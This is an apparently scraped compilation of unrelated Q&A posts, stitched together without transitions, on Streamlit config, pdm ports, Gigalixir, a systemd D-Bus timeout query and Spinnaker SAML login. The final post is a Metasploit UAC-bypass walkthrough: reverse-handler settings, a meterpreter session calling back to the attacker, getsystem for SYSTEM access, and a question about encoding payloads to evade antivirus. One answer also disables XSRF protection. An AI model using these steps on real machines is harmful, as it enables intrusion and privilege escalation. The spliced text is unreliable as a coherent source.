I have a setup.sh file:
mkdir -p ~/.streamlit/
echo "\
[server]\n\
port=$PORT\n\
enableCORS=false\n\
headless=true\n\
\n\
" > ~/.streamlit/config.toml
When I deploy my app on Heroku, it gives Application error H14, while in my logs I can see a small override being done:
2022-06-28T13:59:07.660953+00:00 heroku[wev.1]: Restarting
2022-06-28T13:59:07.663151+00:00 heroku[wev.1]: State changed from up to starting
2022-06-28T13:59:08.426158+00:00 heroku[wev.1]: Stopping all processes with SIGTERM
2022-06-28T13:59:08.470430+00:00 app[wev.1]: Stopping...
2022-06-28T13:59:08.740844+00:00 heroku[wev.1]: Process exited with status 0
2022-06-28T13:59:17.236832+00:00 heroku[wev.1]: Starting process with command `sh setup.sh && streamlit run app.py`
2022-06-28T13:59:17.842753+00:00 heroku[wev.1]: State changed from starting to up
2022-06-28T13:59:19.208294+00:00 app[wev.1]: 2022-06-28 13:59:19.208
2022-06-28T13:59:19.208305+00:00 app[wev.1]: Warning: the config option 'server.enableCORS=false' is not compatible with 'server.enableXsrfProtection=true'.
2022-06-28T13:59:19.208305+00:00 app[wev.1]: As a result, 'server.enableCORS' is being overridden to 'true'.
2022-06-28T13:59:19.208306+00:00 app[wev.1]:
2022-06-28T13:59:19.208306+00:00 app[wev.1]: More information:
2022-06-28T13:59:19.208307+00:00 app[wev.1]: In order to protect against CSRF attacks, we send a cookie with each request.
2022-06-28T13:59:19.208308+00:00 app[wev.1]: To do so, we must specify allowable origins, which places a restriction on
2022-06-28T13:59:19.208308+00:00 app[wev.1]: cross-origin resource sharing.
2022-06-28T13:59:19.208308+00:00 app[wev.1]:
2022-06-28T13:59:19.208309+00:00 app[wev.1]: If cross origin resource sharing is required, please disable server.enableXsrfProtection.
2022-06-28T13:59:19.208309+00:00 app[wev.1]:
2022-06-28T13:59:19.414636+00:00 app[wev.1]:
2022-06-28T13:59:19.414646+00:00 app[wev.1]: You can now view your Streamlit app in your browser.
2022-06-28T13:59:19.414656+00:00 app[wev.1]:
2022-06-28T13:59:19.414692+00:00 app[wev.1]: Network URL: http://172.19.20.38:24743
2022-06-28T13:59:19.414722+00:00 app[wev.1]: External URL: http://3.235.143.6:24743
2022-06-28T13:59:19.414734+00:00 app[wev.1]:
While running, it is overriding my enableCORS=false to true, which I think is causing my application error.
I have previously posted a doubt related to "Application error": Heroku app Application error even after successful deployment message
Do check it for setup.sh and Procfile details.
How can I disable the XsrfProtection?
Per the error, server.enableCORS=false is being overridden because server.enableXsrfProtection is set to true. The solution is to set server.enableXsrfProtection=false:
mkdir -p ~/.streamlit/
echo "
[server]
port=$PORT
enableXsrfProtection=false
enableCORS=false
headless=true
" > ~/.streamlit/config.toml
I am also obliged to note what this setting is protecting against, but assume you are familiar with the risks of toggling it off.
I have installed streamlit on my Mac with pdm and launched the command streamlit hello to view the demos. The command returns the following:
❯ pdm run streamlit hello
2022-03-21 11:43:45.812 WARNING streamlit.config:
Warning: the config option 'server.enableCORS=false' is not compatible with 'server.enableXsrfProtection=true'.
As a result, 'server.enableCORS' is being overridden to 'true'.
More information:
In order to protect against CSRF attacks, we send a cookie with each request.
To do so, we must specify allowable origins, which places a restriction on
cross-origin resource sharing.
If cross origin resource sharing is required, please disable server.enableXsrfProtection.
2022-03-21 11:43:45.816 DEBUG streamlit.logger: Initialized tornado logs
2022-03-21 11:43:45.818 DEBUG matplotlib.pyplot: Loaded backend agg version unknown.
2022-03-21 11:43:45.819 DEBUG streamlit.bootstrap: Setting up signal handler
2022-03-21 11:43:45.819 DEBUG asyncio: Using selector: KqueueSelector
2022-03-21 11:43:45.827 DEBUG streamlit.server.server: Starting server...
2022-03-21 11:43:45.827 DEBUG streamlit.server.server: Serving static content from the Node dev server
2022-03-21 11:43:45.830 DEBUG streamlit.server.server: Server started on port 8501
2022-03-21 11:43:45.831 DEBUG streamlit.server.server: Server state: State.INITIAL -> State.WAITING_FOR_FIRST_BROWSER
2022-03-21 11:43:46.029 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.041 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.054 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.066 DEBUG git.cmd: Popen(['git', 'rev-parse', '--show-toplevel'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
Welcome to Streamlit. Check out our demo in your browser.
Local URL: http://localhost:3000
Network URL: http://192.168.1.117:3000
Ready to create your own Python apps super quickly?
Head over to https://docs.streamlit.io
May you create awesome apps!
However, when I connect to the local URL, the connection is rejected:
I tried switching to Brave Browser and Firefox, but I got the same error.
From other SO questions, I tried the following:
❯ apachectl configtest
AH00557: httpd: apr_sockaddr_info_get() failed for Lucas-MacBook-Air.local
AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message
Syntax OK
I also ran this:
ps -ax | grep 'httpd'
124 ?? 0:00.85 /usr/sbin/httpd -D FOREGROUND
517 ?? 0:00.00 /usr/sbin/httpd -D FOREGROUND
6627 ttys002 0:00.01 grep httpd
I tried launching other stuff that creates a local server, e.g. Jupyter Notebooks, and they work.
The problem is known: streamlit does not support pdm at the time of writing, as mentioned by #cye18 on the parallel issue opened on pdm's github page.
The problem is that, while streamlit configs default to server port 8501, the server is launched on the port 3000. You can force this behaviour in two ways.
The first is by manually changing streamlit's settings, which lie in ~/.streamlit/config.toml or locally in your project directory.
[server]
port = 8501
Alternatively, you can add the following flag to the streamlit command when launching it:
pdm run streamlit run app.py --server.port 8501
Either way, streamlit will complain by saying that server.port does not work when global.developmentMode is true. Once again, this can be solved by adding the flag --global.developmentMode false. The final command will look like this: pdm run streamlit run app.py --server.port 8501 --global.developmentMode false.
Alternatively, the local settings will look like the following:
[server]
port = 8501
[global]
developmentMode = false
I am trying to deploy Hashrocket's TIL Phoenix App to Gigalixir.
This is what I get after push to Gigalixir:
2020-08-23T05:58:55.071975+00:00 til[gigalixir-run]: Attempting to start 'til' on host 'til-6c4c5d7854-ddpfh'
2020-08-23T05:58:55.071987+00:00 til[gigalixir-run]: Attempting health checks on port 4000
2020-08-23T05:58:55.874467+00:00 til[til-6c4c5d7854-ddpfh]: web.1 | started with pid 49
2020-08-23T05:58:57.568099+00:00 til[til-6c4c5d7854-ddpfh]: web.1 | No file named server#127.0.0.1
2020-08-23T05:58:57.976006+00:00 til[til-6c4c5d7854-ddpfh]: web.1 | exited with code 1
2020-08-23T05:58:57.976034+00:00 til[til-6c4c5d7854-ddpfh]: system | sending SIGTERM to all processes
I cannot make sense of the error message No file named server#127.0.0.1. What can I do now?
The reason for this problem is that the Procfile coming with the project is probably meant to be used with Heroku and contains
web: MIX_ENV=prod elixir --cookie $OTP_COOKIE --name server#127.0.0.1 --erl '-kernel inet_dist_listen_min 9000' --erl '-kernel inet_dist_listen_max 9000' -S mix phx.server
Renaming the file to Procfile.disabled and thus making Gigalixir use its default Procfile solves this problem.
In my service configuration, TimeoutStartSec == 100s.
According to the man page, my application needs to notify systemd with sd_notify(READY=1) in <100s. If not, the service is put into the failed state.
https://www.freedesktop.org/software/systemd/man/systemd.service.html
But in case I want to do something (e.g. just print out a log saying: startup is not done in time) before my service is actually set to the failed state.
Is there any chance to do that?
My idea is to create a timer which has the same value as TimeoutStartSec == xx s;
then I can manage to do something before the timer expires.
But the question is: TimeoutStartSec == xx is dynamically configured by the user in my project.
So I would expect some D-Bus interface which would let my application read TimeoutStartSec.
I checked
https://www.freedesktop.org/wiki/Software/systemd/dbus/
but did not find a corresponding property.
I am using systemd on Linux, which can freely use the systemd D-Bus interfaces.
I found a solution.
systemd actually provides that info:
dbus-send --system --dest=org.freedesktop.systemd1 --print-reply /org/freedesktop/systemd1/unit/ServiceName_2eservice \
org.freedesktop.DBus.Properties.Get string:org.freedesktop.systemd1.Service string:TimeoutStartUSec
Note: the name of your service needs to be modified to get the exact object path: ServiceName.service becomes ServiceName_2eservice.
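The object-path escaping and the reply parsing from the answer above, as an added example that is not part of the original post. It generalizes the single `.` to `_2e` case to systemd's full escaping rule; the function names and `SAMPLE_REPLY` are constructed for illustration.

```shell
#!/bin/sh
# Added example. Function names and SAMPLE_REPLY are constructed, not from the post.

# Escape a unit name the way systemd does for D-Bus object paths: every byte
# outside [A-Za-z0-9] becomes _xx (lowercase hex), a leading digit is escaped
# too, and the empty string becomes "_". The ( ... ) body runs in a subshell.
unit_object_path() (
    LC_ALL=C; export LC_ALL
    rest=$1 out=
    [ -n "$rest" ] || out=_
    while [ -n "$rest" ]; do
        c=${rest%"${rest#?}"}          # first character of what is left
        rest=${rest#?}
        case $c in
            [A-Za-z]) out=$out$c ;;
            [0-9])    if [ -n "$out" ]; then out=$out$c
                      else out=_$(printf '%02x' "'$c"); fi ;;
            *)        out=${out}_$(printf '%02x' "'$c") ;;
        esac
    done
    printf '%s\n' "/org/freedesktop/systemd1/unit/$out"
)

# Extract the uint64 from a `dbus-send --print-reply` answer read on stdin.
reply_usec() {
    awk '$1 == "variant" && $2 == "uint64" { print $3; ok = 1 } END { exit !ok }'
}

# Seconds to wait before logging "startup is not done in time", keeping $2
# seconds of margin. UINT64_MAX means the start timeout is disabled.
warn_after_sec() {
    if [ "$1" = 18446744073709551615 ]; then echo infinity; return 0; fi
    total=$(( $1 / 1000000 ))
    if [ "$total" -gt "$2" ]; then echo $(( total - $2 )); else echo 0; fi
}

# Live query, using the dbus-send call from the answer above.
start_timeout_usec() {
    dbus-send --system --dest=org.freedesktop.systemd1 --print-reply \
        "$(unit_object_path "$1")" org.freedesktop.DBus.Properties.Get \
        string:org.freedesktop.systemd1.Service string:TimeoutStartUSec | reply_usec
}

# Constructed sample reply for TimeoutStartSec=100s, so the parsing runs offline.
SAMPLE_REPLY='method return time=1656424757.1 sender=:1.2 -> destination=:1.99 serial=7 reply_serial=2
   variant       uint64 100000000'

warn_after_sec "$(printf '%s\n' "$SAMPLE_REPLY" | reply_usec)" 10
```

On a host with systemd, `warn_after_sec "$(start_timeout_usec ServiceName.service)" 10` gives the delay for the application's own warning timer.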
Scenario:
Upgraded Spinnaker to 1.12.0. No other config changes that would impact this integration (we had to modify an s3 IAM because it quit working). Okta integration stopped working. Public key was reissued during install process for the ingress, may be relevant?
SAML-TRACE shows payload getting to Okta and back
Spinnaker throws two different errors depending on browser and how I get there.
Direct link to deck url: (500) No IDP was configured, please update included metadata with at least one IDP (seen in browser and gate)
Okta "chicklet" in okta dashboard: (401) Authentication Failed: Incoming SAML message is invalid
Config details (again none of this changed):
Downloading metadata directly
JKS is being leveraged and is valid
service url is confirmed
alias for JKS is confirmed
I had this issue as well when upgrading from 1.10.13 to 1.12.2. I found lots of these error messages in Gate's logs:
2019-02-19 05:31:30.421 ERROR 1 --- [.0-8084-exec-10] o.a.c.c.C.[.[.[/].[dispatcherServlet] : Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [org.opensaml.saml2.metadata.provider.MetadataProviderException: No IDP was configured, please update included metadata with at least one IDP] with root cause
org.opensaml.saml2.metadata.provider.MetadataProviderException: No IDP was configured, please update included metadata with at least one IDP
at org.springframework.security.saml.metadata.MetadataManager.getDefaultIDP(MetadataManager.java:795) ~[spring-security-saml2-core-1.0.2.RELEASE.jar:1.0.2.RELEASE]
at org.springframework.security.saml.context.SAMLContextProviderImpl.populatePeerEntityId(SAMLContextProviderImpl.java:157) ~[spring-security-saml2-core-1.0.2.RELEASE.jar:1.0.2.RELEASE]
at org.springframework.security.saml.context.SAMLContextProviderImpl.getLocalAndPeerEntity(SAMLContextProviderImpl.java:127) ~[spring-security-saml2-core-1.0.2.RELEASE.jar:1.0.2.RELEASE]
at org.springframework.security.saml.SAMLEntryPoint.commence(SAMLEntryPoint.java:146) ~[spring-security-saml2-core-1.0.2.RELEASE.jar:1.0.2.RELEASE]
at org.springframework.security.web.access.ExceptionTranslationFilter.sendStartAuthentication(ExceptionTranslationFilter.java:203) ~[spring-security-web-4.2.9.RELEASE.jar:4.2.9.RELEASE]
...
After downgrading back to 1.10.13, I upgraded to the next version, 1.11.0, and found that's when the issue started. Eventually, I looked at Gate's logs from the launch of the Container and found:
2019-02-20 22:31:40.132 ERROR 1 --- [0.0-8084-exec-3] o.o.s.m.provider.HTTPMetadataProvider : Error retrieving metadata from https://000000000000.okta.com/app/00000000000000000/sso/saml/metadata
javax.net.ssl.SSLException: Error in hostname verification
at org.opensaml.ws.soap.client.http.TLSProtocolSocketFactory.verifyHostname(TLSProtocolSocketFactory.java:241) ~[openws-1.5.4.jar:na]
at org.opensaml.ws.soap.client.http.TLSProtocolSocketFactory.createSocket(TLSProtocolSocketFactory.java:186) ~[openws-1.5.4.jar:na]
at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) ~[commons-httpclient-3.1.jar:na]
at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(HttpMethodDirector.java:387) ~[commons-httpclient-3.1.jar:na]
...
This led me to realize that the TLS Certificate was being rejected by Gate. Not sure why it suddenly started failing the check. Up to this point, I had it configured as:
$ hal config security authn saml edit --metadata https://000000000000.okta.com/app/00000000000000000/sso/saml/metadata
I ended up downloading the metadata file and redeploying with halyard.
$ wget https://000000000000.okta.com/app/00000000000000000/sso/saml/metadata
$ hal config security authn saml edit --metadata "${PWD}/metadata"
$ hal config version edit --version 1.12.2
$ hal deploy apply
Opened up a private browser window as suggested by the Spinnaker documentation and Gate started redirecting to Okta correctly again.
Issue filed, https://github.com/spinnaker/spinnaker/issues/4017.
So I ended up finding the answer. The tomcat config changed apparently in spinnaker in later versions for gate.
I created this snippet in ~/.hal/default/profiles/gate-local.yml
server:
  tomcat:
    protocolHeader: X-Forwarded-Proto
    remoteIpHeader: X-Forwarded-For
    internalProxies: .*
Deployed spinnaker and it was back to working.
post/windows/escalate/bypassuac seems to fail for me
For some reason I can't get the post exploitation module bypassuac to work.
This is what I did:
Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
Put the session in background
Tried to use the post exploitation module like this:
use post/windows/escalate/bypassuac
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444
exploit
The port is not used yet so should be fine.
The output is as follows:
[-] Handler failed to bind to 192.168.1.100:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Post module execution completed
Then it returns to the console and does nothing, no new session, nothing whatsoever.
I checked the following things:
Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't
Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?
Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.
Thanks in advance
Halvar
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     no        Host
RPORT    4444             no        Port
SESSION                   yes       The session to run this module on.
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…
meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo